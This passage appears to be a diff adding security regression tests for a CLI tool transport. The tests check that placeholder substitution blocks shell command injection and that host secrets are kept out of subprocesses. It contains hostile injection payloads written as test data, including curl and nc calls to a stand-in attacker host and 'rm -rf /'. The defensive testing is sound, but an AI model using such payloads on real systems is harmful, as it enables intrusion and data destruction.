placeholder is hit. + assert cmd == 'Write-Output "pre `"x`" ${env:' + _v("a") + '}"' + + def test_multiple_placeholders_share_namespace(self, transport): + cmd, env = transport._substitute_utcp_args( + "cmd UTCP_ARG_a_UTCP_END UTCP_ARG_b_UTCP_END", + {"a": "1", "b": "2"}, + NONCE, + ) + assert env[_v("a")] == "1" + assert env[_v("b")] == "2" + assert not re.search(r"UTCP_ARG_[a-zA-Z0-9_]+_UTCP_END", cmd) + + def test_multiple_placeholders_in_same_dq_compose(self, transport): + # The doc-claimed pattern: several placeholders within the same + # quoted region should compose into one argument with the + # surrounding literals. + cmd, env = transport._substitute_utcp_args( + 'curl "https://api/UTCP_ARG_id_UTCP_END/UTCP_ARG_action_UTCP_END"', + {"id": "abc", "action": "del"}, + NONCE, + ) + if os.name == "nt": + assert cmd == ( + 'curl "https://api/${env:' + _v("id") + + '}/${env:' + _v("action") + '}"' + ) + else: + assert ( + cmd + == f'curl "https://api/${{{_v("id")}}}/${{{_v("action")}}}"' + ) + + def test_missing_arg_recorded_via_env(self, transport): + cmd, env = transport._substitute_utcp_args( + "cmd UTCP_ARG_x_UTCP_END", {}, NONCE + ) + assert env[_v("x")] == "MISSING_ARG_x" + assert "UTCP_ARG_x_UTCP_END" not in cmd + + @pytest.mark.parametrize( + "payload", + [ + 'data.csv; curl http://attacker.example', + 'data.csv && rm -rf /', + 'data.csv | nc attacker.example 9999', + 'data.csv `id`', + 'data.csv $(id)', + 'data.csv"; echo pwned; "', + 'value with spaces', + "value'with'quote", + '"; rm -rf /; "', + ], + ) + def test_attacker_bytes_never_appear_in_substituted_command( + self, transport, payload + ): + # Headline guarantee: SCRIPT contains only our reference + the + # template literal chars. Attacker bytes go into env. + if os.name == "nt": + templates = [ + "Write-Output UTCP_ARG_id_UTCP_END", + 'Write-Output "URL=UTCP_ARG_id_UTCP_END"', + ] + else: + templates = [ + "curl UTCP_ARG_id_UTCP_END", + 'curl "https://api/UTCP_ARG_id_UTCP_END"', + "curl 'https://api/UTCP_ARG_id_UTCP_END'", + ] + for tpl in templates: + cmd, env = transport._substitute_utcp_args( + tpl, {"id": payload}, NONCE + ) + # No raw payload metacharacters should appear in cmd. We + # check for `;` which is the canonical injection marker. + assert ";" not in cmd, ( + f"payload bytes leaked into substituted command for " + f"template {tpl!r}: cmd={cmd!r}" + ) + # And the value must round-trip through env. + assert env[_v("id")] == payload + + def test_nonce_changes_between_invocations(self, transport): + # Drive the public path twice; scripts must use different + # env-var names each run. + from utcp_cli.cli_call_template import CommandStep + + commands = [CommandStep(command="echo UTCP_ARG_x_UTCP_END")] + a_script, a_env = transport._build_combined_shell_script( + commands, {"x": "v"} + ) + b_script, b_env = transport._build_combined_shell_script( + commands, {"x": "v"} + ) + assert next(iter(a_env.keys())) != next(iter(b_env.keys())) + + +# --------------------------------------------------------------------------- +# _prepare_environment must NOT leak the full host environment. +# --------------------------------------------------------------------------- + +class TestPreparedEnvironmentDoesNotLeakSecrets: + SECRET_KEYS = [ + "OPENAI_API_KEY", + "ANTHROPIC_API_KEY", + "AWS_SECRET_ACCESS_KEY", + "AWS_ACCESS_KEY_ID", + "AZURE_CLIENT_SECRET", + "GITHUB_TOKEN", + "DATABASE_URL", + "SLACK_TOKEN", + ] + + def test_secrets_in_host_env_do_not_propagate(self, transport, monkeypatch): + for k in self.SECRET_KEYS: + monkeypatch.setenv(k, f"super-secret-{k}") + provider = CliCallTemplate(commands=[{"command": "echo hi"}]) + env = transport._prepare_environment(provider) + for k in self.SECRET_KEYS: + assert k not in env, ( + f"{k} leaked from host environment into CLI subprocess " + "(GHSA-5v57-8rxj-3p2r). Only the safe-keys allowlist plus " + "provider.env_vars / inherit_env_vars should propagate." + ) + + def test_explicit_env_vars_are_preserved(self, transport, monkeypatch): + monkeypatch.setenv("OPENAI_API_KEY", "host-value") + provider = CliCallTemplate( + commands=[{"command": "echo hi"}], + env_vars={"OPENAI_API_KEY": "explicit-value", "MY_FLAG": "1"}, + ) + env = transport._prepare_environment(provider) + assert env["OPENAI_API_KEY"] == "explicit-value" + assert env["MY_FLAG"] == "1" + + def test_essentials_are_preserved(self, transport, monkeypatch): + monkeypatch.setenv("PATH", "/usr/local/bin:/usr/bin:/bin") + provider = CliCallTemplate(commands=[{"command": "echo hi"}]) + env = transport._prepare_environment(provider) + assert "PATH" in env + + def test_env_vars_override_safe_defaults(self, transport, monkeypatch): + monkeypatch.setenv("PATH", "/usr/bin") + provider = CliCallTemplate( + commands=[{"command": "echo hi"}], + env_vars={"PATH": "/custom/bin"}, + ) + env = transport._prepare_environment(provider) + assert env["PATH"] == "/custom/bin" + + def test_inherit_env_vars_passes_named_host_secrets(self, transport, monkeypatch): + monkeypatch.setenv("OPENAI_API_KEY", "sk-from-host") + monkeypatch.setenv("AWS_PROFILE", "prod") + monkeypatch.setenv("DATABASE_URL", "postgres://...") + + provider = CliCallTemplate( + commands=[{"command": "echo hi"}], + inherit_env_vars=["OPENAI_API_KEY", "AWS_PROFILE"], + ) + env = transport._prepare_environment(provider) + assert env["OPENAI_API_KEY"] == "sk-from-host" + assert env["AWS_PROFILE"] == "prod" + assert "DATABASE_URL" not in env + + def test_inherit_env_vars_skips_unset(self, transport, monkeypatch): + monkeypatch.delenv("THIS_DOES_NOT_EXIST", raising=False) + provider = CliCallTemplate( + commands=[{"command": "echo hi"}], + inherit_env_vars=["THIS_DOES_NOT_EXIST"], + ) + env = transport._prepare_environment(provider) + assert "THIS_DOES_NOT_EXIST" not in env + + def test_env_vars_override_inherit_env_vars(self, transport, monkeypatch): + monkeypatch.setenv("OPENAI_API_KEY", "host-value") + provider = CliCallTemplate( + commands=[{"command": "echo hi"}], + inherit_env_vars=["OPENAI_API_KEY"], + env_vars={"OPENAI_API_KEY": "explicit-override"}, + ) + env = transport._prepare_environment(provider) + assert env["OPENAI_API_KEY"] == "explicit-override" + + def test_inherit_env_vars_empty_list_is_strict_mode(self, transport, monkeypatch): + monkeypatch.setenv("PATH", "/usr/bin") + monkeypatch.setenv("HOME", "/home/x") + monkeypatch.setenv("OPENAI_API_KEY", "secret") + + provider = CliCallTemplate( + commands=[{"command": "echo hi"}], + inherit_env_vars=[], + ) + env = transport._prepare_environment(provider) + assert env == {} + + def test_inherit_env_vars_empty_list_with_env_vars(self, transport, monkeypatch): + monkeypatch.setenv("PATH", "/usr/bin") + provider = CliCallTemplate( + commands=[{"command": "echo hi"}], + inherit_env_vars=[], + env_vars={"FOO": "bar"}, + ) + env = transport._prepare_environment(provider) + assert env == {"FOO": "bar"} + + def test_inherit_env_vars_list_replaces_default_allowlist( + self, transport, monkeypatch + ): + monkeypatch.setenv("PATH", "/usr/bin") + monkeypatch.setenv("HOME", "/home/x") + monkeypatch.setenv("OPENAI_API_KEY", "secret") + + provider = CliCallTemplate( + commands=[{"command": "echo hi"}], + inherit_env_vars=["OPENAI_API_KEY"], + ) + env = transport._prepare_environment(provider) + assert env == {"OPENAI_API_KEY": "secret"} + + def test_default_inherit_env_vars_includes_path_and_home( + self, transport, monkeypatch + ): + monkeypatch.setenv("PATH", "/usr/bin") + if os.name == "nt": + monkeypatch.setenv("USERPROFILE", "C:\\Users\\x") + home_key = "USERPROFILE" + else: + monkeypatch.setenv("HOME", "/home/x") + home_key = "HOME" + + provider = CliCallTemplate(commands=[{"command": "echo hi"}]) + env = transport._prepare_environment(provider) + assert env["PATH"] == "/usr/bin" + assert home_key in env + + def test_explicit_none_matches_default(self, transport, monkeypatch): + monkeypatch.setenv("PATH", "/usr/bin") + monkeypatch.setenv("OPENAI_API_KEY", "secret") + + omitted = CliCallTemplate(commands=[{"command": "echo hi"}]) + explicit_none = CliCallTemplate( + commands=[{"command": "echo hi"}], + inherit_env_vars=None, + ) + assert ( + transport._prepare_environment(omitted) + == transport._prepare_environment(explicit_none) + ) + + def test_list_replaces_default_does_not_pull_in_other_defaults( + self, transport, monkeypatch + ): + monkeypatch.setenv("PATH", "/usr/bin") + monkeypatch.setenv("HOME", "/home/x") + monkeypatch.setenv("USERPROFILE", "C:\\Users\\x") + monkeypatch.setenv("LANG", "en_US.UTF-8") + + provider = CliCallTemplate( + commands=[{"command": "echo hi"}], + inherit_env_vars=["PATH"], + ) + env = transport._prepare_environment(provider) + assert env == {"PATH": "/usr/bin"} + + def test_duplicate_names_in_inherit_env_vars_are_idempotent( + self, transport, monkeypatch + ): + monkeypatch.setenv("FOO", "1") + provider = CliCallTemplate( + commands=[{"command": "echo hi"}], + inherit_env_vars=["FOO", "FOO", "FOO"], + ) + env = transport._prepare_environment(provider) + assert env == {"FOO": "1"} + + def test_unset_names_in_default_allowlist_are_skipped( + self, transport, monkeypatch + ): + for key in transport._default_inherited_keys(): + monkeypatch.delenv(key, raising=False) + monkeypatch.setenv("PATH", "/usr/bin") + + provider = CliCallTemplate(commands=[{"command": "echo hi"}]) + env = transport._prepare_environment(provider) + assert env == {"PATH": "/usr/bin"} + for v in env.values(): + assert v is not None + assert isinstance(v, str) + + +class TestInheritEnvVarsSerialization: + def test_round_trip_preserves_none(self): + tpl = CliCallTemplate(commands=[{"command": "x"}]) + d = CliCallTemplateSerializer().to_dict(tpl) + assert d.get("inherit_env_vars", None) is None + rebuilt = CliCallTemplateSerializer().validate_dict(d) + assert rebuilt.inherit_env_vars is None + + def test_round_trip_preserves_empty_list(self): + tpl = CliCallTemplate( + commands=[{"command": "x"}], inherit_env_vars=[] + ) + d = CliCallTemplateSerializer().to_dict(tpl) + assert d["inherit_env_vars"] == [] + rebuilt = CliCallTemplateSerializer().validate_dict(d) + assert rebuilt.inherit_env_vars == [] + + def test_round_trip_preserves_listed_names(self): + tpl = CliCallTemplate( + commands=[{"command": "x"}], + inherit_env_vars=["PATH", "OPENAI_API_KEY"], + ) + d = CliCallTemplateSerializer().to_dict(tpl) + assert d["inherit_env_vars"] == ["PATH", "OPENAI_API_KEY"] + rebuilt = CliCallTemplateSerializer().validate_dict(d) + assert rebuilt.inherit_env_vars == ["PATH", "OPENAI_API_KEY"] + + +# --------------------------------------------------------------------------- +# End-to-end (Unix only -- bash payload assumptions). Lock down the +# regression where a placeholder INSIDE surrounding double quotes +# allowed injection in the inline-shlex.quote 1.1.2 strategy. +# --------------------------------------------------------------------------- + +@pytest.mark.skipif(os.name == "nt", reason="bash payload assumptions") +@pytest.mark.asyncio +async def test_no_command_injection_bare_unix(tmp_path): + transport = CliCommunicationProtocol() + canary = tmp_path / "pwned-bare" + script = tmp_path / "echo_arg.py" + script.write_text( + "import sys\nprint('arg:' + sys.argv[1])\n" + ) + call_template = CliCallTemplate( + commands=[ + {"command": f"{sys.executable} {script} UTCP_ARG_value_UTCP_END"} + ] + ) + payload = f"benign; touch {canary}" + result = await transport.call_tool( + None, "echo_arg", {"value": payload}, call_template + ) + assert not canary.exists(), "Command injection regression (GHSA-33p6-5jxp-p3x4)" + assert "benign; touch" in str(result) + + +@pytest.mark.skipif(os.name == "nt", reason="bash payload assumptions") +@pytest.mark.asyncio +async def test_no_command_injection_dq_unix(tmp_path): + """The exact bypass scenario the inline shlex.quote in 1.1.2 missed: + placeholder inside surrounding double quotes with a value crafted + to close the dq early.""" + transport = CliCommunicationProtocol() + canary = tmp_path / "pwned-dq" + call_template = CliCallTemplate( + commands=[ + {"command": 'echo "URL=UTCP_ARG_id_UTCP_END"'} + ], + working_dir=str(tmp_path), + ) + payload = f'"; touch {canary}; "' + result = await transport.call_tool( + None, "echo_url", {"id": payload}, call_template + ) + assert not canary.exists(), ( + "Double-quote-context command injection regression " + "(GHSA-33p6-5jxp-p3x4 follow-up). The shlex.quote-in-dq bypass " + "must stay closed." + ) + assert "URL=" in str(result) + assert "touch" in str(result) + + +@pytest.mark.skipif(os.name == "nt", reason="bash payload assumptions") +@pytest.mark.asyncio +async def test_no_command_injection_sq_unix(tmp_path): + transport = CliCommunicationProtocol() + canary = tmp_path / "pwned-sq" + call_template = CliCallTemplate( + commands=[ + {"command": "echo 'URL=UTCP_ARG_id_UTCP_END end'"} + ], + working_dir=str(tmp_path), + ) + payload = f"'; touch {canary}; '" + result = await transport.call_tool( + None, "echo_url", {"id": payload}, call_template + ) + assert not canary.exists() + assert "URL=" in str(result) + + +@pytest.mark.skipif(os.name == "nt", reason="bash payload assumptions") +@pytest.mark.asyncio +async def test_host_secret_not_inherited_unix(monkeypatch): + """Host secret not in inherit_env_vars must not reach subprocess.""" + monkeypatch.setenv("UTCP_TEST_LEAK_PROBE", "should-not-leak") + transport = CliCommunicationProtocol() + call_template = CliCallTemplate( + commands=[ + {"command": 'echo "probe=${UTCP_TEST_LEAK_PROBE:-MISSING}"'} + ], + ) + result = await transport.call_tool( + None, "leak_probe", {}, call_template + ) + assert "probe=MISSING" in str(result) + assert "should-not-leak" not in str(result) + + +@pytest.mark.skipif(os.name == "nt", reason="bash payload assumptions") +@pytest.mark.asyncio +async def test_inherit_env_vars_opts_in_unix(monkeypatch): + monkeypatch.setenv("UTCP_TEST_LEAK_PROBE", "inherited-value") + transport = CliCommunicationProtocol() + call_template = CliCallTemplate( + commands=[ + {"command": 'echo "probe=${UTCP_TEST_LEAK_PROBE:-MISSING}"'} + ], + inherit_env_vars=["PATH", "UTCP_TEST_LEAK_PROBE"], + ) + result = await transport.call_tool( + None, "leak_probe", {}, call_template + ) + assert "probe=inherited-value" in str(result)